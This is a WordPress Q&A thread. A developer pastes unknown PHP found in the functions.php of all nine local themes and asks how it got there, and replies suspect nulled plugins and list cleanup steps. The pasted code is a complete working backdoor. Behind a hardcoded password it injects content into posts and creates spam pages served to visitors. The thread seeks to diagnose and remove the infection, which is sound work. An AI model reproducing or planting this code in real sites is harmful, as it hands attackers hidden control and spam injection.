# WordPress - an unknown code appears in function.php

Tags: wordpress

Recently when I am working on my theme, I got a warning. When I tried to fix it I realize that in function.php there is a unknown code. I have 9 themes in themes directory, and in all 9 functions.php exist that unknown code. Does someone know how it can appear. The website is not online yet. I'm working on my local.

```
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '117c3f294ee80873d833d9e03f417ed0'))
    {
        switch ($_REQUEST['action'])
            {
                case 'get_all_links';
                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                        {
                            $data['code'] = '';

                            if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                                {
                                    $data['code'] = $_[1];
                                }

                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                        }
                break;

                case 'set_id_links';
                    if (isset($_REQUEST['data']))
                        {
                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');

                            $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                                {
                                    print "true";
                                }
                        }
                break;

                case 'create_page';
                    if (isset($_REQUEST['remove_page']))
                        {
                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                                {
                                    print "true";
                                }
                        }
                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                        {
                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                                {
                                    print "true";
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_URL_CD";
            }

        die("");
    }


if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }

        exit;
    }


?>
```

Comment: are you using woocommerce on your site?

Comment: or are using nulled plugin(s) or theme?

Answer (score 0):

It seems like you are using nulled plugin(s) and/or theme.

Steps taken to clean your development site:

1. deletes all core files
2. uploaded new core files downloaded from wordpress.org
3. reinstalled all plugins
4. ran a scan with sucuri security plugin

Please be careful downloading what is called `nulled` plugins. The can ruin your site. Only download and use plugins/themes from trusted sources.

Comment: I use Contact Form 7 plugin and https://github.com/scottsweb/wp-instagram-widget. Please can you clarify what is nulled plugins?

Comment: Basically means you get the paid version free.

Comment: Here is the same plugin in wordpress directory https://wordpress.org/plugins/wp-instagram-widget/

Comment: So you are using only two plugins. Please tell me the theme name?

Comment: I create my own theme, from scratch.

Comment: please share your site url

Comment: Let us [continue this discussion in chat](http://chat.stackoverflow.com/rooms/134655/discussion-between-user3351236-and-amit).